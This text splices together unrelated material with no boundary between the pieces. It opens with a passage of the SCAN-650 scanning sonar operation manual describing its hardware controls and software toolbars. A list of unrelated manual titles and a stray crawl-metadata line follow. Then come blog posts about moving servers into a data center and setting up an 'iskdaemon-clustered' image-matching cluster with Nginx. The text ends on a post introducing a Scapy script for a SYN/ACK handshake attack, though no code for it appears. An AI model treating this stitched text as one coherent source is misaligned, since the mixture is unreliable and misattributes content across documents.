17 OPERATOR SWITCHES AND CONTROLS (continued) SONAR PROCESSOR POWER INPUT - The power input for the Sonar Processor can be any voltage between 9 and 12 volts dc. A wall transformer is also supplied with the SCAN-650 which allows the Sonar Processor to be powered from 120/220 volts ac. The wall transformer converts 120/220 volts ac to 12 volts dc. A dc power cable with red and black alligator clips on the end is also supplied with the system; the dc cable can be connected to any high capacity 9 to 12 volt battery (such as a 12v automobile battery). POWER SWITCH - When switched to the ON position power is applied to the processor s electronics and the green LED is illuminated. If the cable to the scanning head is connected (it should be before power is turned on) then power is also sent to the downstairs electronics. PC INTERFACE - A USB cable connects the Sonar Processor to the PC GPS/LORAN INPUT connector - Your GPS plugs into this connector. The Sonar Processor requires a NMEA 0183 input. It may be necessary to select this type of input from a menu in the GPS or LORAN unit (see page 34 Appendix A for more detail). CABLE LENGTH COMPENSATION switch Adjusts the gain of an amplifier to compensate for the various lengths and qualities of signal cables that can be used with the system. Switch position 1 is used for shorter cables (such as a 150ft cable). Switch position 5 is used for long cables (such as a 2000ft cable). TRANSDUCER HEAD (SCANNING HEAD) connector - The cable from the Scanning Head Electronics attaches to this connector. NEAR GAIN CONTROL - Adjusts the gain for objects close to the scanning head. FAR GAIN CONTROL - Adjusts the gain of TVG amplifier so that the reflected signal from objects farthest from the Head can be amplified sufficiently to produce an image on the monitor. OVERALL GAIN CONTROL - Adjusts the darkness of the sonar image in the selected color. 17
18 OPERATOR SWITCHES AND CONTROLS (Continued) - THE SOFTWARE The majority of operator controls are located in toolbars on the screen. The number of tools in each toolbar, and therefor the number of toolbars, will depend on the resolution setting on your computer display. The resolution setting for the display below was 1024 by 768. Top Toolbar File Position Toolbar Mode/Screen Toolbar Playback Speed Bar or Sweep Speed Bar Settings Toolbar Sweep origin (scanning head) Sweep progress indicator Range mark rings on the display make it easy to determine the distance from the sonar head to the target. SOFTWARE MENUS: There are 5 pulldown menus available: FILE, VIEW, ACTIONS, SETTINGS and HELP. The selections available under each heading: File: Record new file - This is used to record a new sonar file. Open file - Use this to open an existing sonar file for playback. Save screen as a picture - Saves the image on the sonar screen as a Bitmap file. Print screen - Prints the image shown on the screen. Exit - closes the SCAN-650 program. 18
19 OPERATOR SWITCHES AND CONTROLS (continued) View: The number of toolbars available under VIEW depends on the display resolution selected for the monitor. The higher resolution settings permit a single large toolbar (Mode/Screen Toolbar), where a lower resolution setting (640 by 480) requires three toolbars (Standard/Playback/Screen Position) to show the same number of icons. Details for each of these toolbars is covered later in the manual. Mode/Screen Toolbar - Displays icons for various tools on left side of screen. Playback Slider bar - Active in Playback mode. Allows the operator to control the playback speed of recorded files. The speed can be adjusted from very slow to very fast. File Position Toolbar - Used when Playback is selected. Displays the approximate location in the file for the present image being displayed. Operator can instantly move anywhere in the file by moving the slider. Screen Position - Moves the origin of the sweep display giving the operator a larger viewing area. Center, Left, Right, Top, Bottom can be selected. Show Range Rings - Makes the range rings visible in the sector the sonar is sweeping. This can assist the operator in determining the distance to a target. The default command is not to show the range rings. Display GPS - The GPS position is shown in the BOAT LOCA- TION section of the Righthand Toolbar. Settings Toolbar - Show or hide the right hand settings toolbar Actions: The commands shown under the ACTION pulldown menu duplicate many of the commands shown on the Playback and Mode/ Screen Toolbars. Record - Selecting this command operates the sonar and saves the data to a file. Monitor Mode - This command is for real time viewing of sonar images without recording data. Playback - Used to playback a previously recorded file. Playback with Continuous Loop - Continuously repeats the playback of a recorded file. Rewind - Rewind a recorded file. Fast Forward - Views the recorded file in fast motion. Stop - Stops the recording or playing back of a file. Record Highlights - Records select parts (edits) of a previously recorded sonar record to a 19
20 OPERATOR SWITCHES AND CONTROLS (continued) separate file (see page 24 for details). Settings: Set Serial Port number - The Sonar Processor has an integrated USB to Serial communications port. The operator must select the Sonar Processor com port for proper operation. Note: Use the same physical USB port on the PC every time. Set Head Orientation - The choices are normal or inverted. The sonar operator must identify whether the scanning head is mounted right side up (normal) as would be if mounted on top of a ROV, or upside down (inverted) as if it was pole mounted and deployed over the side of a boat. If the orientation is set incorrectly, targets that should be displayed on the left side of the screen will be displayed on the right side. Set Date Format - The operator can choose either: month/ day/ year or day/month/year. The date is displayed in the Settings Toolbar. Set Time Format - The operator can choose either a 12 hour or 24 hour time format. The time is displayed in the Settings Toolbar. Restore Default Settings - Returns settings to the original factory default settings. Help: Help Topics - Refers you to Operators Manual for help. Company contact information is provided. About Sonar - Revision information and Company contact information is provide 20
21 OPERATOR SWITCHES AND CONTROLS (continued) TOOL BARS: Mode/Screen Toolbar- The Mode/Screen toolbar allows for easy 1-click access to many software functions. A Tooltip stating the name of a button will appear when the mouse cursor hovers over the button. These controls are duplicates of Menu functions, please refer to the Software Menus section of this manual starting on page 19 for a detailed explanation of the commands below. - Removes tool bar from screen. - Record new file. - Monitor Mode, only real time viewing of the sonar image with no recording of data. - Playback - Fast forward - Rewind - Rewind to beginning of file. - Stop playing file, - Open a file for playback, - Save screen as Bitmap picture. - Clear the screen. - Print creen. - Center of the screen. - Top center of the screen. - Down center of the screen. - Left center of the screen. - Right center of the screen. - Upper left corner - Upper right - Lower left corner - Lower right corner - Zooms in on sonar image. These Screen Position commands move the center of the scanned area to best match the display to the sector being scanned. File Position Toolbar - Used when Playback is selected. Displays the approximate location in the file for the present image being displayed. Operator can instantly move anywhere in the file by moving the slider. 21
22 OPERATOR SWITCHES AND CONTROLS (continued) TOOL BARS: (CONTINUED) Playback Slider bar - Active in Playback mode. Allows the operator to control the playback speed of recorded files. The speed can be adjusted from very slow to very fast. Sweep speed bar - Only needed if your SCAN-650 Sonar Processor connects to your PC using a PC-CARD. If your Sonar Processor connects to your PC using a USB port, the Sweep Speed Bar is not used [speed adjustment is automatic]. Active in Recording and Monitor mode. Allows the operator to optimize sweep speed to match the speed of the computer. To set the optimum speed, move the slider toward FAST until the data is only shown in half of the screen sector ( a mirror image is shown in each half of the chosen sector). Now move the slider slightly toward SLOW until data is shown in the full chosen sector. Note: Slider adjustments only take effect the beginning of the next sweep. Note: The sweep speed must be optimized for each combination of Range and Step. The software will save the user optimized setting for each combination. 22
23 OPERATOR SWITCHES AND CONTROLS (continued) TOOLBARS: (CONTINUED) Settings Toolbar Displayed on the right side of the screen. Information and pull down menus are: - Range - The range setting sets the radius of area to be scanned. Range settings of: 5, 10, 20, 40, or 60 meters are available. A 360 sweep with a range setting of 10 meters would result in a total scan diameter of 20 meters. - Steps -The steps setting sets the number of degrees the transducer rotates between the individual pings of a sweep. The smaller the step, the higher the image resolution. Larger steps reduce the time it takes to scan a sector, but trade image quality. Step degrees of 1/2, 1.0, 1.5, or 2.0 degrees are available. - Start of Sweep, End of Sweep - Allows the user to select the sector that will be scanned. The angle can be selected from the pulldown menus or can be typed into the box. Please refer to page 25 for more details. - Sector - When depressed, the sweep rotates between the Start of Sweep angle and the End of Sweep angle. Scans perfomed using the Sector setting will start in a clockwise direction and reverse direction at the end of each sweep SCAN - When depressed the sweep rotates continuously (360 deg), always clockwise. - Zoom - Sets the magnification of the displayed image. Available Zoom settings are: 50%, 100%. 150%, and 200%. 100% is normal. The Zoom setting can also be changed by pressing the + and - keys on the keyboard. - Color Bar - Displays the colors for the sonar image being displayed. Zero or weak echo returns are represented by the colors on the left side of the bar and strong returns are the colors on the right side of the color bar. - Color - Selects the colors for the color bar. There are numerous color choices. The color combinations allow the sonar image to be displayed in various shades of both colors. The best color is a matter of operator preference although at times a sonar image can appear to be more distinct in one particular color. Clicking repeatedly on the COLOR button scrolls through the color choices, or the color can be selected by clicking on the down arrow on the right hand side of the box showing the color name. - Invert Color - Clicking the invert color button inverts the color bar. The colors on the left are now on the right and the colors on the right are now on the left. At times a sonar image can appear to be more distinct by vewing it in an inverted color set. - Gain - The software gain control should be used only during playback to compensate for images recorded with improper TVG control settings. The gain can be adjusted from -5 to +5 in one digit increments. Clicking repeatedly on the GAIN button scrolls through the 11 gain settings. The gain can also be set by clicking on the down arrow on the right hand side of the box showing the gain number. Positive numbers increase the gain, negative numbers decrease the gain. The Gain should be set to 0 during recording. 23
Dash 18X / Dash 18 Data Acquisition Recorder
75 Dash 18X / Dash 18 Data Acquisition Recorder QUICK START GUIDE Supports Recorder System Software Version 3.1 1. INTRODUCTION 2. GETTING STARTED 3. HARDWARE OVERVIEW 4. MENUS & BUTTONS 5. USING THE DASH
SA-9600 Surface Area Software Manual
SA-9600 Surface Area Software Manual Version 4.0 Introduction The operation and data Presentation of the SA-9600 Surface Area analyzer is performed using a Microsoft Windows based software package. The
Quick Start Using DASYLab with your Measurement Computing USB device
Quick Start Using DASYLab with your Measurement Computing USB device Thank you for purchasing a USB data acquisition device from Measurement Computing Corporation (MCC). This Quick Start document contains
Interactive Functions Manual
Interactive Functions Manual July, 2011 1 Contents How to use the pen... 3 Use with Windows... 4 Use with Mac OS... 15 Troubleshooting... 22 2 How to use the pen Before using the pen, install the batteries.
About This Guide SolarEdge Configuration Tool Software Guide. About This Guide
About This Guide 3 About This Guide This user guide is intended for Photovoltaic (PV) system owners, installers, technicians, maintainers, administrators and integrators who are authorized to configure
:
USB 2.0 VGA ADAPTER USER MANUAL
USB 2.0 VGA ADAPTER USER MANUAL CONTENTS INTRODUCTION... 3 FEATURES... 3 SYSTEM REQUIREMENTS... 3 PACKAGE CONTENTS... 3 SUPPORTED COMMON DISPLAY RESOLUTION... 4 TECHNICAL SPECIFICATIONS... 4 INSTALLATION
Dash 8Xe / Dash 8X Data Acquisition Recorder
75 Dash 8Xe / Dash 8X Data Acquisition Recorder QUICK START GUIDE Supports Recorder System Software Version 2.0 1. INTRODUCTION 2. GETTING STARTED 3. HARDWARE OVERVIEW 4. MENUS & BUTTONS 5. USING THE DASH
Camera Operation Quick Start Guide
2 Camera Operation Quick Start Guide This Quick Start Guide describes the installation and operation of a camera together with the SAM BalanceLab system. Any camera that is Windows compatible or provides
1. Open the battery compartment as shown in the image.
This Quick User Guide helps you get started with the IRIScan Book 3 scanner. This scanner is supplied with the software applications Readiris Pro 12, IRIScan Direct and IRISCompressor. Corresponding Quick
EasyMP Network Projection Operation Guide
EasyMP Network Projection Operation Guide Contents 2 Before Use Functions of EasyMP Network Projection... 5 Sharing the Projector... 5 Various Screen Transfer Functions... 5 Installing the Software...
Interactive Functions Manual
Interactive Functions Manual Optical touch control projector packing list... i Accessories...ii Install in Windows OS... 1 Install in Mac OS... 20 Install in Linux OS... 28 Troubleshooting... 30
Transmitter Interface Program
Transmitter Interface Program Operational Manual Version 3.0.4 1 Overview The transmitter interface software allows you to adjust configuration settings of your Max solid state transmitters. The following
1 ImageBrowser Software Guide
1 ImageBrowser Software Guide Table of Contents (1/2) Chapter 1 Try It! ImageBrowser Starting ImageBrowser -------------------------------------------------- 4 Importing Images to Your Computer ---------------------------------
ActiView. Visual Presenter Image Software User Manual - English
ActiView Visual Presenter Image Software User Manual - English Date: 05/02/2013 Table of Contents 1. Introduction... 3 2. System Requirements... 3 3. Install ActiView - Windows OS... 4 4. Install ActiView
User Guide Win7Zilla
User Guide Win7Zilla Table of contents Section 1: Installation... 3 1.1 System Requirements... 3 1.2 Software Installation... 3 1.3 Uninstalling Win7Zilla software... 3 Section 2: Navigation... 4 2.1
13 Managing Devices. Your computer is an assembly of many components from different manufacturers. LESSON OBJECTIVES
LESSON 13 Managing Devices OBJECTIVES After completing this lesson, you will be able to: 1. Open System Properties. 2. Use Device Manager. 3. Understand hardware profiles. 4. Set performance options. Estimated....................................................
ADINSTRUMENTS. making science easier. LabChart 7. Student Quick Reference Guide
ADINSTRUMENTS making science easier LabChart 7 Student Quick Reference Guide How to use this guide The LabChart Student Quick Reference Guide is a resource for users of PowerLab systems in the classroom
RACEAIR REMOTE PAGER SYSTEM
Computech Systems, Inc. 301-884-5712 30071 Business Center Dr. Charlotte Hall, MD 20622 RACEAIR REMOTE PAGER SYSTEM TM Introduction: Computech s RaceAir Remote Competition Weather Station with the Data
History of Revisions. Ordering Information
No part of this document may be reproduced in any form or by any means without the express written consent of II Morrow Inc. II Morrow, Apollo, and Precedus are trademarks of II Morrow Inc. Windows,
PART 1. Using USB Mixer with a Computer
PART 1. Using USB Mixer with a Computer Universal Serial Bus Mixers The USB mixer is equipped with either one or two USB ports that allow you to play and record audio directly from your computer! Just
Smart Board Low Cost Interactive Whiteboard
Smart Board Low Cost Interactive Whiteboard The Bluetooth Digital Pen Pre-paired Bluetooth USB Dongle Quick Installation Guide QUICK SOFTWARE SETUP & DRIVER INSTALLATION ILS Communications
USB 2.0 to DVI/VGA Pro Installation Guide
Introduction USB 2.0 to DVI/VGA Pro Installation Guide The USB 2.0 to DVI/VGA Pro adds DVI or VGA port to your USB enabled system. Key Features and Benefits Quickly adds a monitor, LCD or projector to
Magic Wand Portable Scanner
Magic Wand Portable Scanner PDS-ST470-VP User Manual Table of Contents 1. Key Features... 3 2. Functional Parts... 3 3. Explanation of the Status Icons... 5 4. Using the Scanner... 5 4.1. Charging up the
Operating Systems. and Windows
Operating Systems and Windows What is an Operating System? The most important program that runs on your computer. It manages all other programs on the machine. Every PC has to have one to run other applications
Animated Lighting Software Overview
Animated Lighting Software Revision 1.0 August 29, 2003 Table of Contents SOFTWARE OVERVIEW 1) Dasher Pro and Animation Director overviews 2) Installing the software 3) Help 4) Configuring the software
Calibration Kit. General Instructions. Table of Contents. System Requirements
Calibration Kit These instructions provide information on the installation, connection and operation of the Calibration Kit for use with SOR 800 Series pressure products, specifically the 805PT and 805QS.
Introduction to Computers
Introduction to Computers Parts of a computer Monitor CPU 3 Keyboard 3 4 4 Mouse 3 4 Monitor The monitor displays the content and operations of the computer. It is the visual display of what the computer
Back Office Recorder Dig04 Installation Guide
Back Office Recorder Dig04 Installation Guide Comvurgent Limited Date & Issue: Issue 3 Dec 2005 Comvurgent Downloads Available at UK Office +44 (0) 7950 916362
Introduction Note Trademarks System Requirements
Introduction Thank you for purchasing this Olympus product. Before you start to use your new Olympus product, please read these instructions carefully to enjoy optimum performance. Note The contents of
AXIS Camera Station Quick Installation Guide
AXIS Camera Station Quick Installation Guide Copyright Axis Communications AB April 2005 Rev. 3.5 Part Number 23997 1 Table of Contents Regulatory Information.................................. 3 AXIS Camera
User s Guide , Rev 100
User s Guide 436-0002-10, Rev 100 Thermal Imaging Overview The FLIR Vue camera is a state-of-the-art thermal imaging system. The system is easy to use, but it is useful to understand how to interpret what
TruPower-Portable-500W. Solar Starter kit
TruPower-Portable-500W Solar Starter kit This Solar starter kit is an easy to use solar power supply system that is the complete solution for all your solar power needs. It is a solar generator that converts
TR-3 Channel Editor. Software Manual
TR-3 Channel Editor Software Manual Trilithic Company Profile Trilithic is a privately held manufacturer founded in 1986 as an engineering and assembly company that built and designed customer-directed
SainSmart DDS Series User Manual (Software)
SainSmart DDS Series User Manual (Software) For Oscilloscope, Signal Generator and Logic Analyzer Updated software and user manual can be downloaded from
Federal Communications Commission (FCC) Radio Frequency Interference Statement
Federal Communications Commission (FCC) Radio Frequency Interference Statement User s Manual This equipment has been tested and found to comply with the limits for a Class B digital device, pursuant to
USB 3.0 Display Adapter
Introduction USB 3.0 Display Adapter Installation Guide The USB 3.0 Display Adapter allows you to connect a monitor, LCD or projector to your desktop or notebook PC and use it as an extended desktop or
NETWORK PRINT MONITOR User Guide
NETWORK PRINT MONITOR User Guide Legal Notes Unauthorized reproduction of all or part of this guide is prohibited. The information in this guide is subject to change without notice. We cannot be held liable
The following was taken directly from the ARD (Apple Remote Desktop) operator s manual:
The following was taken directly from the ARD (Apple Remote Desktop) operator s manual: Copying Files Apple Remote Desktop makes it easy to update items on one or more client computers. Copying files works
Personal USB VoIP Gateway User s Guide
Personal USB VoIP Gateway User s Guide Contents Contents... 2 Welcome... 3 Package Contents...4 Requirements... 5 USB Gateway Installation... 6 Enabling USB GATEWAY... 18 USB GATEWAY States... 20 USB Gateway
System Requirements. Hiro H50113
1 Hiro H50113 System Requirements Hiro H50113 Computer with Pentium 200 MMX or higher processor. Windows 2000, Windows XP Home / Professional, XP Professional x64 Edition, Vista 32 / 64 Families, Windows
Pictorial User s Guide
S-T IMAGING Pictorial User s Guide Copyright 2008 ST Imaging, Inc. a division of Digital Check Corp. All Rights Reserved. Table of Contents Getting Started... 1 Adjust for Viewing...1 Loading Microfilm...2
reflecta Super 8 Scanner
reflecta Super 8 Scanner User Manual 1 FEDERAL COMMUNICATIONS COMMISSION (FCC) STATEMENT This Equipment has been tested and found to comply with the limits for a class B digital device, pursuant to
SecureLinx Spider Duo Quick Start Guide
SecureLinx Spider Duo Quick Start Guide SecureLinx Spider Duo Quick Start Guide SecureLinx Spider Duo QUICK START GUIDE CONTENTS Overview... 2 What s In The Box... 3 Installation and Network Settings...
Turtle Beach Grip 500 Laser Gaming Mouse. User Guide
Turtle Beach Grip 500 Laser Gaming Mouse User Guide Table of Contents Table of Contents... 4 Introduction... 5 Installation... 5 Opening and Closing Grip 500 Configuration Software... 6 Configuring Your
Captureboard C-20 Series. Software Operation Manual
Captureboard C-20 Series PLUS C-20 Software Software Operation Manual We greatly appreciate your purchase of this PLUS Corporation product. In order to take full advantage of the features of the PLUS C-20
USB TV BOX XTREME MT4156
USB TV BOX XTREME MT4156 User s Guide EN Contents Introduction...2 Features...2 Specification...3 System requirements...3 Package contents...3 Device Installation Steps...3 How to use honestech TVR...7
Basics. Mbox 2. Version 7.0
Basics Mbox 2 Version 7.0 Copyright 2005 Digidesign, a division of Avid Technology, Inc. All rights reserved. This guide may not be duplicated in whole or in part without the express written consent of
Ultra Thin Client TC-401 TC-402. Users s Guide
Ultra Thin Client TC-401 TC-402 Users s Guide CONTENT 1. OVERVIEW... 3 1.1 HARDWARE SPECIFICATION... 3 1.2 SOFTWARE OVERVIEW... 4 1.3 HARDWARE OVERVIEW...5 1.4 NETWORK CONNECTION... 7 2. INSTALLING THE
Contents. Hardware Configuration... 27 Uninstalling Shortcuts Black...29
Contents Getting Started...1 Check your Computer meets the Minimum Requirements... 1 Ensure your Computer is Running in Normal Sized Fonts... 7 Ensure your Regional Settings are Correct... 9 Reboot
AirLiner Slate. Page 1
AirLiner Slate Page 1 About An AirLiner wireless slate allows you to interact wirelessly with our computer. It can be used with a Smart board, but one is not required. Multiple slate users can write at
Business Plus Accounting Hardware Setup Guide For Windows XP
Business Plus Accounting Hardware Setup Guide For Windows XP 1 Contents Chapter 1 - Description of Computer Ports...3 Chapter 2 - Connecting Your Touch Screen...4 Chapter 3 Setting Up Your Printers
Ortelia Space Builder User Manual
Ortelia Space Builder User Manual 1 Table of Contents Introducing Ortelia Space Builder... 2 System Requirements... 3 1. Operating system:... 3 2. Hardware:... 3 Minimum Graphics card
Magic Control Technology Corporation. Android Mirror KM-C6105. User Manual
Magic Control Technology Corporation Android Mirror KM-C6105 Table of Contents Features... 3 Specifications... 3 Getting Started... 4 Windows 7 / XP - First Time Installation... 4 Windows 7 Start the Andriod
LSR4300 Control Center Software
LSR4300 Control Center Software User Guide Updated for version 2.0 software Table Of Contents Introduction...3 System Requirements...4 Installation...4 Launching The Software...5 Reference...7 Main Screen...7
Installing S500 Power Monitor Software and LabVIEW Run-time Engine
EigenLight S500 Power Monitor Software Manual Software Installation... 1 Installing S500 Power Monitor Software and LabVIEW Run-time Engine... 1 Install Drivers for Windows XP... 4 Install VISA run-time...
VM-4 USB Desktop Audio Device Installation Guide
VM-4 USB Desktop Audio Device Installation Guide THE POSSIBILITIES ARE ENDLESS. 9 Austin Drive, Marlborough, CT 06447 (860) 295-8100 sales@essentialtel.com Table of Contents Introduction...3
Watch Your Garden Grow
Watch Your Garden Grow The Brinno GardenWatchCam is a low cost, light weight, weather resistant, battery operated time-lapse camera that captures the entire lifecycle of any garden season by taking photos | http://docplayer.net/1211239-Scan-650-scanning-sonar-operation-manual-jw-fishers-mfg-inc-rev-811.html | CC-MAIN-2019-04 | refinedweb | 7,433 | 63.7 |
September 17, 2014 at 06:13 AM
Studio Bebop has been growing a lot over the last year. We're now incorporated, and last week moved all of our server equipment into our very own (colocation) data center!
Before I get into the big data center move, I first have to rewind back to early 2013 and my first foray into hosting my own servers. At the time I was developing a price comparison website (like Expedia or Kayak) for PVC figures from anime and video games, called Figure Stalk (which is still under development FYI).
The core component of what makes Figure Stalk run is an image matching engine that compares images of potential product matches on other vendor websites with the images on a source product page you'd feed into the website. (If you'd like to know more about the image matching engine stuff, you should take a peek at this blog post I wrote about it.) The only problem is that the image matching engine requires a fairly large amount of RAM to play with in order to be fast enough to be more than a proof of concept, and at the time all of Studio Bebop's hosting needs were being facilitated with VPS servers from Linode, who while great for what they do, weren't really equipped to meet our needs for this project (at least without costing me an arm and a leg).
So after crunching the numbers, I decided to throw caution to the wind and bought the components for a manly man server with RAM for days. Two weeks, a couple orders for missing components, and a loving kernel configuration later, Bebop3 was born! In the interest of brevity I won't bore you with all the hardware details suffice to say that Bebop3 ended up having 96 GB of RAM, 2x 2.0 Ghz 8 Core CPUs, an SSD for the OS and DB, and a 1 TB WD Red for holding all the static content.
Armed with my new super server, I was then faced with the task of finding a nice fat pipe and a static IP to hook it up to that was both close enough to where I lived in case I needed to perform maintenance, but also far enough away so that my apartment didn't end up looking like an episode of Serial Experiments Lain. At the time I was unaware that colocation was even a thing, so I ended up signing a three year agreement for business class internet with Comcast. The package I was able to get with them was for 1 static IP, 20 Mb/s up, and 50 Mb/s down for $225 a month, and while not ideal, it at least got the job done and was the best option I had available to me at the time.
Or rather I should say, it got the job done until a month or so later when I launched Yugioh Prices, which in turn took off like a rocket and quickly maxed out my measly 20 Mb/s up speed. As time went on and Yugioh Prices continued to grow in popularity, I ended up working around my bandwidth limitations with Comcast by hosting the Yugioh card images that were eating up all of my bandwidth on 4 separate Linodes, and using a round-robin load balancing strategy to split the load over the four. (Because even though Linode had the the bandwidth to serve the images without a problem, they limited me to 4 TB a month of outgoing data per VPS, and on a heavy month we'd push out somewhere between 12 and 13 TB in Yugioh card images at least.)
This set up would have been ideal if Yugioh Prices and Figure Stalk were the only things that Bebop3 was hosting, but after about a year the machine had become the primary back-end workhorse for Studio Bebop and was hosting 18 different websites and support APIs for our various products, and after seeing top stats like these as the norm last month, I knew it was time once again to invest in more server hardware. This investment took the form of Bebop6, a clone of Bebop3, but with much scarier fans.
With Bebop6 in tow, I gave Comcast the boot (well more like just unplugged everything and agreed to keep paying them because they've got me locked in a contract for another 18 months :/), and signed up with Fibernet here in Orem. I cannot understate how impressed with Fibernet I am, and how excited I am to have my servers housed in their data center, after hacking around with trying to do it myself with a mobile rackmount tank at my aunt and uncle's house in Spanish Fork, it is a huge relief to finally be in a real data center!
I've signed up for Fibernet's full cabinet bundle, which gets me:
Phew, well that's enough background on why I ended up moving my server hardware into a data center, so how about some pictures already!
Oh, and just in case you're wondering why the left fan on Bebop3 isn't spinning, it's because I accidentally got a little too close to it while it was running, and it ended up sucking one of the cuff buttons right off of my jacket, which it then proceeded to snap two of its blades off on. Now that's the kind of excessive cooling power every server should have, grunt grunt.
March 13, 2013 at 12:00 PM
imgSeek (and it's server-side variant iskdaemon) is an open source image matching engine developed by Ricardo Cabral. In a nutshell, imgSeek makes it possible (with just a little bit of hacking) to perform reverse image searches and visual similarity comparisons against a specific group of images of your choice, just like Google Images or TinEye (but without the beefy monthly fees). For more information, take a look at the official imgSeek documentation.
For those of you who may not see the value in being able to do reverse image searches and visual similarity comparisons on an arbitrary set of images, allow me to elaborate with a real-world example of how I use imgSeek.
Ever since mid-November I've been using imgSeek to handle all of the server-side logic behind the "identify a card by taking a picture of it" feature of my iOS app Duel Master: Yu-Gi-Oh Edition. With this feature all a user has to do is take a picture of a Yu-Gi-Oh card, and within seconds all of the relevant information about that particular card (details, rulings, prices, etc) will be presented to them. This is all accomplished by uploading the picture they took to one of the Studio Bebop API servers, feeding it through imgSeek, and then returning the results to the app for additional processing and presentation. You can see a demonstration of this feature in action in the promo video below.
As you can see, imgSeek definitely works, and it works pretty well too. However don't let my super awesome app promo fool you, there are some serious drawbacks and kinks to using imgSeek. Despite the fact that imgSeek is technically stable enough to be deployed for real-world projects, the truth is that it is still in-development software, and as such suffers from bugs, hiccups, and scary segmentation faults.
Moreover, imgSeek doesn't scale very well, especially when it comes to handling lots of requests at once. While there is some vague mention of a "clustered mode" within the default iskdaemon configuration file, it isn't actually an implemented feature yet. As such, if you hit a stock copy of iskdaemon with lots of requests at a time, you're going to start to see some serious lag due to the fact that at the moment a stock copy of iskdaemon can only process one request at a time. So if it takes roughly one second for your copy of iskdaemon to perform a visual similarity comparison, and you've got twenty or thirty requests in the queue, you can expect some serious latency. (Which will only grow worse as you add more images to your database.)
Luckily for all of you, I've taken it upon myself to implement fixes for all of theses gripes (and a few more I didn't bother mentioning), and put them into a special branch of iskdaemon called iskdaemon-clustered!
Clustered Access Layout
The basic theory behind clustering instances of iskdaemon is pretty straightforward. First you launch multiple instances of iskdaemon, each listening on a different port, but all sharing the same image database file. Then, you use Nginx (or whatever HTTP daemon floats your boat), to handle the actual load balancing via a round robin style proxy pass. Simple right? WRONG! Well sort of...
The above layout will work fine as long as you're just performing read requests (queryImgID, queryImgBlob, queryImgPath), but once you start doing write requests (addImgBlob, addImg) through the load balancing proxy pass, that's when things start to break. To put it simply, your instance nodes will start to develop database inconsistencies with each other. By which I mean that some nodes will have an image, while others some won't. Moreover once you start trying to save/load to the same database file things get even worse, because that's when you'll start to see endless loops of database errors and/or crashes.
To overcome this shortcoming, I decided to tweak things so that there is a separate instance of iskdaemon running outside of the proxy pass group, that is specifically dedicated to performing write requests. Then with the addition of some fancy h4x, I made it so that the reader iskdaemon instances in the proxy pass group automatically update their local copies of the image database so that they are always up to date.
Implementing the separate writer instance was pretty straight forward, but the logic behind keeping all of the reader instances up to date is a bit more complicated. In this next section I'll be going over in detail how I do that. You don't have to read the next section to compile/install iskdaemon-clustered, but you probably should. If you don't feel like it, skip ahead to Installing iskdaemon-clustered On Your Server.
Overcoming Database Inconsistencies With Multiple Iskdaemon Instances
Clustered access layout with separate writer instance.
The reason that parallel iskdaemon instances can develop database inconsistencies in the first place lies in the fact that iskdaemon reads and writes its image data to a single database file that is only read into memory when the iskdaemon process first starts. Any image data you add via addImgBlob or addImg is held only in memory until you call saveDb.
So when you add an image to your images database using one of your parallel instances of iskdaemon, the other instances won't know about it until they reread the database file, which normally only happens when you start iskdaemon. To overcome this hurdle I've modified queryImgBlob and queryImgID so that they call a special function that checks to see if the images database has been modified since the last time there was a read request, and rereads it into memory if there have been any changes, before doing any actual image matching work.
Unfortunately rereading the database file into memory is trickier than you might think. If for instance you try to reread the database file while your writer process is in the middle of saving its new changes, you'll more than likely run into a fat load of read errors that could potentially send your reader instances into an infinite loop of database errors. To work around this issue, I implemented another special function that copies the main images database file into a temporary file, which is read, and then deleted. If the read fails for some reason, the function recurses into itself until it successfully rereads the image database file. I'll be the first to admit that it's not the most elegant of solutions, but it's simple, and it works.
Below is a flow chart that outlines the process iskdaemon-clustered uses to handle read requests without running into database inconsistencies.
Installing iskdaemon-clustered On Your Server
Please note that the following instructions are for compiling/installing on a *nix system. You're on your own Windows users.
First up, make sure you have all of the necessary prerequisites. (If you are using Gentoo, you should be able to emerge all of this stuff without any problems.)
Next, clone the iskdaemon-clustered Github repository.
git clone
Now compile iskdaemon-clustered!
$ cd iskdaemon-clustered $ cd src $ python setup.py build $ sudo python setup.py install
Now assuming that you have all of the necessary prerequisites, and nothing went wrong, iskdaemon-clustered should now be installed on your system. If you are having problems compiling, try taking a look at the installation instructions on the imgSeek website.
Now for the fun part, configuring your iskdaemon cluster! As I explained earlier, the basic concept here is to launch multiple instances of iskdaemon.py in parallel that all share the same database file. To make this easier for you, I've included a python script (launch-clustered-isk.py) that makes this super easy (again it's a little hacky, but it gets the job done without too much work).
First copy launch-clustered-isk.py to wherever you'd like to hold the database and other files for your iskdaemon cluster. (I just use my home directory.)
cp iskdaemon-clustered/launch-clustered-isk.py ~
launch-clustered-isk.py should work right out of the box, but for the sake of learning, let's take a quick peak at it's configuration options.
Open launch-clustered-isk.py up in your favorite text editor (Nano master race reporting in). Lines 19-23 are the places where you can make adjustments where you need/want to, each line is commented, but I'll give you a quick overview anyway.
Once you have launch-clustered-isk.py configured just the way you want it, it's time to configure Nginx to handle proxying requests to your cluster.
Open up Nginx's config file (should be /etc/nginx/nginx.conf on Gentoo) in your favorite text editor, and in the http{} section, add the following lines.
http { upstream isk-cluster { server localhost:1337; server localhost:1338; server localhost:1339; # ... skipping some lines, and assuming you configured 12 reader instances server localhost:1346; server localhost:1347; server localhost:1348; } # listen on localhost on port 81 server { listen 81; server_name localhost; location / { proxy_pass; } } }
Now (re)start Nginx, and then run launch-clustered-isk.py. If everything went right, you should see a bunch of lines about launching iskdaemon instances and listening on different ports. If you see error messages, something has gone terribly terribly wrong, and it's up to you to figure out what.
Assuming everything went as planned, you should now be able to access your iskdaemon read cluster from, and your writing instance via. Have fun!
Miscellaneous Tips and Information
$ screen $ ./launch-clustered-isk.py &
$ killall launch-clustered-isk.py $ killall iskdaemon.py
$ echo renice -n -10 -p `echo \`pgrep iskdaemon.py\` | sed -e 's/ / /g'` | sudo /bin/bash
I use iskdaemon-clustered in the following projects.
If you have an idea to improve iskdaemon-clustered, or are using it in a project, let me know!
January 18, 2013 at 12:00 PM
I wrote this script a long time ago when I was just starting to learn about networking basics. During that time, I came across a Python library that makes it easy to craft and manipulate network traffic at a packet level by the name of Scapy.
I wrote this script as a demonstration of a SYN/ACK Three Way Handshake Attack as discussed by Halla of Information Leak in an article that has since mysteriously disappeared from his site. I also mentioned this script in an article I wrote about hacking gibsons or something to that effect, that I have since removed form this site because the writing in it was atrocious. (Well it was written by a ninth grader, so that's not a huge surprise.)
